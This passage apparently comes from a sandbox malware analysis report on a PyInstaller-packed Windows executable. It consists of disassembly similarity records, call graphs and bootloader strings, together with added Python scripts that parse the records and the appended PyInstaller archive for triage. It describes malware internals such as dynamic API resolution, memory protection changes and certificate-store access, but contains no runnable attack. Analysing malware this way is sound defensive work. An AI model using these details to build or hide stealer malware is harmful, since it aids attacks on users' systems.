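            current.strings = [s for s in value.split("$") if s]
        elif key == "API String ID":
            current.api_string_id = value
        elif key == "Opcode Fuzzy Hash":
            current.opcode_fuzzy_hash = value
        elif key == "Instruction Fuzzy Hash":
            current.instruction_fuzzy_hash = value
    return records


def find_by_api(records: List[FunctionRecord], needle: str) -> List[FunctionRecord]:
    """Case-insensitive substring match on the collapsed API ID (e.g. 'CreateDirectory')."""
    return [r for r in records if needle.lower() in r.api_id.lower()]


def pyinstaller_indicators(records: List[FunctionRecord]) -> List[FunctionRecord]:
    return [r for r in records if r.looks_like_pyinstaller()]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for r in recs:
        flag = " [PyInstaller?]" if r.looks_like_pyinstaller() else ""
        print(f"proc {r.process_no} base {r.offset} api={r.api_id} "
              f"strings={r.strings} opcode={r.opcode_fuzzy_hash[:16]}...{flag}")
```

The opcode and instruction fuzzy hashes are what make these records useful across reports: once parsed, they can be compared against records from another analysis of the same family to find the same bootloader or stealer function in a differently packed sample.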
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                          • Instruction ID: 5599cfb3d23e029742ee504dcece9105c60dab53edeb8fa6f9d016d85c4cf59a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16114522B24B0ACAEB40DB60E8442A933A4FB19758F440E35EA6D867A4DF3CD1588340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                          • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                          • Instruction ID: 07ca307dfe24972e1085f23b7e02e2018b70b1bf25b10b42bbcecd75f8bde3c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA412813A2C78242FBA4AB25F40137A6790EBA0BA4F144279EE5D87AF5DF3DD541DB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEE90B6
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF67AEDCC15), ref: 00007FF67AEE90D4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, xrefs: 00007FF67AEE90C2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                          • API String ID: 3580290477-1075608045
                                                                                                                                                                                                                                          • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                          • Instruction ID: 1eaa4b620d65d1167b525d564f01c72e049bd763d75ceb8213aeea71616cf9e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE417D73A2CB5286FB14EF25E8900BD63E4EF447D0B554075EA4E83BA5DE3DE8819340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                          • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                          • Instruction ID: 36159fc43ec5a3f4997be3bbefe2bca9038f51860b30d1743edf442ec718850a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8241C373B28A8585EB609F65E4443BA6760FB88794F404035EE4DC7BA8EF3DD451DB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                          • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                          • Instruction ID: 1effbd518c66fb1945d5406363462a7ac6157f37c9dc05a6e1c250a08e9f3362
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
• Instruction Fuzzy Hash: 8A21F673A2C28282FB20AB11D05427D73B1FB84B44FD58079DA8C876A4DF7CEA45DB81
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction ID: 4d21789b438987d9e33a242363f828b8d2f97b24b93566cdc693db9eb449d521
• Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction Fuzzy Hash: 92113733628B8182EB609B19F400269B7A0FB88B98F684274DE8D47769EF3CC551CB00
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
• Instruction ID: 8ca7c61e88d1af83991327eecde94ce22566cad148cb600ab8e4541fe47382c9
• Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
• Instruction Fuzzy Hash: E8018F6393C64386FB60BF60A46627E23A0EF84749F8010BAD54DC66E1EF2CE544EF14

Execution Graph

Execution Coverage: 2.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1.1%
Total number of Nodes: 743
Total number of Limit Nodes: 25
calls _get_daylight 74956->75009 74957->74956 74960 7ff67aef6415 74957->74960 74959 7ff67aef63e0 75010 7ff67aeea950 37 API calls _invalid_parameter_noinfo 74959->75010 74966 7ff67aef69d4 74960->74966 74964 7ff67aef63ec 74964->74927 75012 7ff67aef6708 74966->75012 74969 7ff67aef6a61 75032 7ff67aee8590 74969->75032 74970 7ff67aef6a49 75044 7ff67aee4f58 11 API calls _get_daylight 74970->75044 74982 7ff67aef6440 74982->74964 75011 7ff67aee8568 LeaveCriticalSection 74982->75011 74989 7ff67aef6a4e 75045 7ff67aee4f78 11 API calls _get_daylight 74989->75045 75009->74959 75010->74964 75013 7ff67aef6734 75012->75013 75017 7ff67aef674e 75012->75017 75013->75017 75057 7ff67aee4f78 11 API calls _get_daylight 75013->75057 75015 7ff67aef6743 75058 7ff67aeea950 37 API calls _invalid_parameter_noinfo 75015->75058 75019 7ff67aef67cc 75017->75019 75059 7ff67aee4f78 11 API calls _get_daylight 75017->75059 75018 7ff67aef681d 75028 7ff67aef687a 75018->75028 75063 7ff67aee9be8 37 API calls 2 library calls 75018->75063 75019->75018 75061 7ff67aee4f78 11 API calls _get_daylight 75019->75061 75022 7ff67aef6876 75025 7ff67aef68f8 75022->75025 75022->75028 75024 7ff67aef6812 75062 7ff67aeea950 37 API calls _invalid_parameter_noinfo 75024->75062 75064 7ff67aeea970 17 API calls _isindst 75025->75064 75026 7ff67aef67c1 75060 7ff67aeea950 37 API calls _invalid_parameter_noinfo 75026->75060 75028->74969 75028->74970 75065 7ff67aef0348 EnterCriticalSection 75032->75065 75044->74989 75045->74982 75057->75015 75058->75017 75059->75026 75060->75019 75061->75024 75062->75018 75063->75022 75067 7ff67aee7968 75066->75067 75070 7ff67aee7444 75067->75070 75069 7ff67aee7981 75069->74548 75071 7ff67aee745f 75070->75071 75072 7ff67aee748e 75070->75072 75081 7ff67aeea884 37 API calls 2 library calls 75071->75081 75080 7ff67aee54dc EnterCriticalSection 75072->75080 75075 7ff67aee747f 75075->75069 75076 7ff67aee7493 75077 7ff67aee74b0 38 API calls 75076->75077 75078 7ff67aee749f 75077->75078 75079 7ff67aee54e8 
_fread_nolock LeaveCriticalSection 75078->75079 75079->75075 75081->75075 75083 7ff67aedfeb3 75082->75083 75084 7ff67aedfee1 75082->75084 75093 7ff67aeea884 37 API calls 2 library calls 75083->75093 75086 7ff67aedfed3 75084->75086 75092 7ff67aee54dc EnterCriticalSection 75084->75092 75086->74554 75088 7ff67aedfef8 75089 7ff67aedff14 72 API calls 75088->75089 75090 7ff67aedff04 75089->75090 75091 7ff67aee54e8 _fread_nolock LeaveCriticalSection 75090->75091 75091->75086 75093->75086 75094->74571 75096 7ff8a8aa6ee0 75097 7ff8a8aa7ad6 75096->75097 75104 7ff8a8aa6ef8 75096->75104 75098 7ff8a8aa79e3 LoadLibraryA 75099 7ff8a8aa79fd 75098->75099 75102 7ff8a8aa7a1c GetProcAddress 75099->75102 75099->75104 75101 7ff8a8aa7a3e VirtualProtect VirtualProtect 75101->75097 75102->75099 75103 7ff8a8aa7a33 75102->75103 75104->75098 75104->75101 75105 7ff8b910982c 75106 7ff8b910985b 75105->75106 75107 7ff8b9109881 75106->75107 75109 7ff8b91098dc 75106->75109 75110 7ff8b910990e 75109->75110 75111 7ff8b9103e74 5 API calls 75110->75111 75115 7ff8b910992c 75110->75115 75113 7ff8b91099ce 75111->75113 75114 7ff8b9103e74 5 API calls 75113->75114 75113->75115 75116 7ff8b9104610 WSAGetLastError 75113->75116 75114->75113 75115->75107 75116->75113 75117 7ff67aed2fe0 75118 7ff67aed2ff0 75117->75118 75119 7ff67aed3041 75118->75119 75120 7ff67aed302b 75118->75120 75122 7ff67aed3061 75119->75122 75132 7ff67aed3077 __std_exception_copy 75119->75132 75145 7ff67aed2710 54 API calls _log10_special 75120->75145 75146 7ff67aed2710 54 API calls _log10_special 75122->75146 75124 7ff67aedc5c0 _log10_special 8 API calls 75126 7ff67aed31fa 75124->75126 75125 7ff67aed3037 __std_exception_copy 75125->75124 75127 7ff67aed1470 116 API calls 75127->75132 75128 7ff67aed3349 75153 7ff67aed2710 54 API calls _log10_special 75128->75153 75130 7ff67aed1c80 49 API calls 75130->75132 75131 7ff67aed3333 75152 7ff67aed2710 54 API calls _log10_special 75131->75152 75132->75125 75132->75127 75132->75128 75132->75130 
75132->75131 75134 7ff67aed330d 75132->75134 75136 7ff67aed3207 75132->75136 75151 7ff67aed2710 54 API calls _log10_special 75134->75151 75137 7ff67aed3273 75136->75137 75147 7ff67aeea474 37 API calls 2 library calls 75136->75147 75139 7ff67aed329e 75137->75139 75140 7ff67aed3290 75137->75140 75149 7ff67aed2dd0 37 API calls 75139->75149 75148 7ff67aeea474 37 API calls 2 library calls 75140->75148 75143 7ff67aed329c 75150 7ff67aed2500 54 API calls __std_exception_copy 75143->75150 75145->75125 75146->75125 75147->75137 75148->75143 75149->75143 75150->75125 75151->75125 75152->75125 75153->75125 75234 7ff8a9307140 75235 7ff8a9307150 75234->75235 75236 7ff8a9307160 75235->75236 75237 7ff8a9326905 SetLastError 75235->75237 75238 7ff8a92e1cf8 SetLastError 75235->75238 75239 7ff8a92e146a SetLastError 75235->75239 75237->75236 75238->75236 75239->75236 75240 7ff8a930f870 75241 7ff8a930f88a 75240->75241 75242 7ff8a930f8a0 75241->75242 75244 7ff8a92e1f32 75241->75244 75244->75242 75245 7ff8a92f8350 75244->75245 75246 7ff8a92f836a SetLastError 75245->75246 75247 7ff8a92f8391 75246->75247 75247->75242 75163 7ff8a9337b50 75165 7ff8a9337b68 75163->75165 75164 7ff8a9337c76 75165->75164 75166 7ff8a92e1b4a 9 API calls 75165->75166 75166->75165 75167 7ff8b9109e34 75168 7ff8b9109e47 75167->75168 75169 7ff8b9109ea6 75168->75169 75171 7ff8b9109f18 00007FF8A8C4BB78 75168->75171 75172 7ff8b9109f4c 75171->75172 75180 7ff8b9109f79 75171->75180 75183 7ff8b910be54 CertOpenStore 75172->75183 75174 7ff8b9109f5c 75176 7ff8b9109f6b GetLastError 75174->75176 75174->75180 75175 7ff8b910a039 CertEnumCertificatesInStore 75179 7ff8b910a04e 75175->75179 75182 7ff8b9109f54 75175->75182 75176->75180 75177 7ff8b910a0ec CertCloseStore 75177->75174 75177->75180 75178 7ff8b910a0a4 CertFreeCertificateContext 75178->75179 75179->75177 75180->75169 75181 7ff8b910a053 75181->75178 75182->75174 75182->75175 75182->75181 75184 7ff8b910be92 75183->75184 75189 7ff8b910be8e 75183->75189 75185 7ff8b910be96 
CertOpenStore 75184->75185 75187 7ff8b910bedb CertCloseStore 75184->75187 75188 7ff8b910bef0 75184->75188 75185->75184 75186 7ff8b910bec1 CertAddStoreToCollection 75185->75186 75186->75184 75186->75187 75187->75184 75188->75189 75190 7ff8b910bef5 CertCloseStore 75188->75190 75189->75182 75190->75189 75191 7ff67aee5698 75192 7ff67aee56b2 75191->75192 75193 7ff67aee56cf 75191->75193 75216 7ff67aee4f58 11 API calls _get_daylight 75192->75216 75193->75192 75195 7ff67aee56e2 CreateFileW 75193->75195 75197 7ff67aee574c 75195->75197 75198 7ff67aee5716 75195->75198 75196 7ff67aee56b7 75217 7ff67aee4f78 11 API calls _get_daylight 75196->75217 75220 7ff67aee5c74 46 API calls 3 library calls 75197->75220 75219 7ff67aee57ec 59 API calls 3 library calls 75198->75219 75202 7ff67aee5751 75205 7ff67aee5755 75202->75205 75206 7ff67aee5780 75202->75206 75203 7ff67aee56bf 75218 7ff67aeea950 37 API calls _invalid_parameter_noinfo 75203->75218 75204 7ff67aee5724 75208 7ff67aee5741 CloseHandle 75204->75208 75209 7ff67aee572b CloseHandle 75204->75209 75221 7ff67aee4eec 11 API calls 2 library calls 75205->75221 75222 7ff67aee5a34 51 API calls 75206->75222 75212 7ff67aee56ca 75208->75212 75209->75212 75213 7ff67aee578d 75223 7ff67aee5b70 21 API calls _fread_nolock 75213->75223 75215 7ff67aee575f 75215->75212 75216->75196 75217->75203 75218->75212 75219->75204 75220->75202 75221->75215 75222->75213 75223->75215

Control-flow Graph
[Basic-block graph of the entry function at 7ff67aed1000 (blocks 7ff67aed1000 to 7ff67aed405b), rendered as text edges; the drawing and its executed / not-executed colouring are not recoverable. Windows APIs called directly from these blocks: SetDllDirectoryW followed by LoadLibraryExW (block 7ff67aed3da7, with a second SetDllDirectoryW at 7ff67aed3de8), and PostMessageW followed by GetMessageW (blocks 7ff67aed3f41 and 7ff67aed4006), the latter consistent with the splash-screen strings listed below. Every other edge is a call into the module's own helpers (7ff67aed1c80, 7ff67aed2710, 7ff67aed45b0, 7ff67aed8a20, 7ff67aee4fa0, 7ff67aee52c0 and others) or into the CRT. Read together with the strings below, this is the main routine of the PyInstaller onefile bootloader: it adjusts the DLL search path, loads a DLL via LoadLibraryExW, and runs the message loop for the optional splash screen.]
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                          • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                          • Opcode ID: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
                                                                                                                                                                                                                                          • Instruction ID: cafc582e4898b173757be918cddb94462a8f1988d49ae1e67d160993d5bff82a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A329F23A2C68391FA69BB24D4543B96761AFC4784FA440B6DA4DC32F6EF2CE554E700
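The strings above (MEI, pkg, _PYI_ARCHIVE_FILE, _PYI_SPLASH_IPC and the PKG-archive error messages) identify this function as the PyInstaller onefile bootloader, so the Python code that actually runs is not in the disassembled image at all: it sits in a CArchive appended after the PE, which the bootloader unpacks into a MEI temporary directory at start-up. The first triage step is therefore to locate that archive and list its table of contents. The script below is an added example written for this page, not code from the report or from the PyInstaller project. It follows PyInstaller's CArchive layout (an 88-byte cookie packed as `!8sIIii64s` whose magic begins with MEI, preceded by a table of `!iIIIBc` entries) and builds a small constructed bundle to parse; the entry names, Python version number and trailer bytes in it are placeholders, not data from file.exe.

```python
import struct
import zlib
from dataclasses import dataclass
from typing import List, Optional

# CArchive layout used by PyInstaller's bootloader (version 4 and later): the
# appended archive ends with an 88-byte cookie, and a table of contents sits
# just before the cookie. Field order and packing follow PyInstaller's
# CArchiveReader; the sample bundle built below is entirely constructed.
COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"                  # magic, pkg_len, toc_off, toc_len, pyver, pylib
COOKIE_LEN = struct.calcsize(COOKIE_FMT)   # 88
TOC_ENTRY_FMT = "!iIIIBc"                  # entry_len, pos, clen, ulen, cflag, typecode
TOC_ENTRY_LEN = struct.calcsize(TOC_ENTRY_FMT)  # 18


@dataclass
class Entry:
    name: str
    typecode: str          # 'b' binary, 'z' PYZ archive, 's' script, 'x' data, 'o' option
    offset: int            # relative to the archive start
    compressed_len: int
    uncompressed_len: int
    compressed: bool


@dataclass
class CArchive:
    start: int             # file offset at which the appended archive begins
    python_version: int
    pylib_name: str
    entries: List[Entry]


def find_cookie_offset(data: bytes) -> int:
    # In a clean onefile build the cookie is the last 88 bytes of the file, but
    # data can follow it (an Authenticode signature, appended junk), so locate
    # the last occurrence of the magic instead of assuming a position.
    off = data.rfind(COOKIE_MAGIC)
    return off if off >= 0 and off + COOKIE_LEN <= len(data) else -1


def parse_carchive(data: bytes) -> Optional[CArchive]:
    """Return the archive description, or None if no PyInstaller cookie is present."""
    off = find_cookie_offset(data)
    if off < 0:
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FMT, data[off:off + COOKIE_LEN])
    start = off + COOKIE_LEN - pkg_len     # pkg_len covers body + TOC + cookie
    if start < 0 or toc_off + toc_len > pkg_len:
        raise ValueError("cookie length fields are inconsistent with the file")
    toc = data[start + toc_off:start + toc_off + toc_len]
    entries, pos = [], 0
    while pos < len(toc):
        if pos + TOC_ENTRY_LEN > len(toc):
            raise ValueError("truncated TOC entry")
        elen, dpos, clen, ulen, cflag, typ = struct.unpack(
            TOC_ENTRY_FMT, toc[pos:pos + TOC_ENTRY_LEN])
        if elen < TOC_ENTRY_LEN or pos + elen > len(toc):
            raise ValueError("bad TOC entry length")
        name = toc[pos + TOC_ENTRY_LEN:pos + elen].rstrip(b"\0").decode("utf-8", "replace")
        entries.append(Entry(name, typ.decode("ascii", "replace"), dpos, clen, ulen, cflag != 0))
        pos += elen
    return CArchive(start, pyver, pylib.rstrip(b"\0").decode("ascii", "replace"), entries)


def extract_entry(data: bytes, archive: CArchive, name: str) -> bytes:
    entry = next(e for e in archive.entries if e.name == name)
    begin = archive.start + entry.offset
    raw = data[begin:begin + entry.compressed_len]
    if len(raw) != entry.compressed_len:
        raise ValueError("entry data runs past the end of the file")
    if not entry.compressed:
        return raw
    # Bound the inflate by the advertised size so a lying TOC cannot turn into a
    # decompression bomb, then insist that the zlib stream really ended there.
    inflater = zlib.decompressobj()
    out = inflater.decompress(raw, entry.uncompressed_len)
    if len(out) != entry.uncompressed_len or not inflater.eof:
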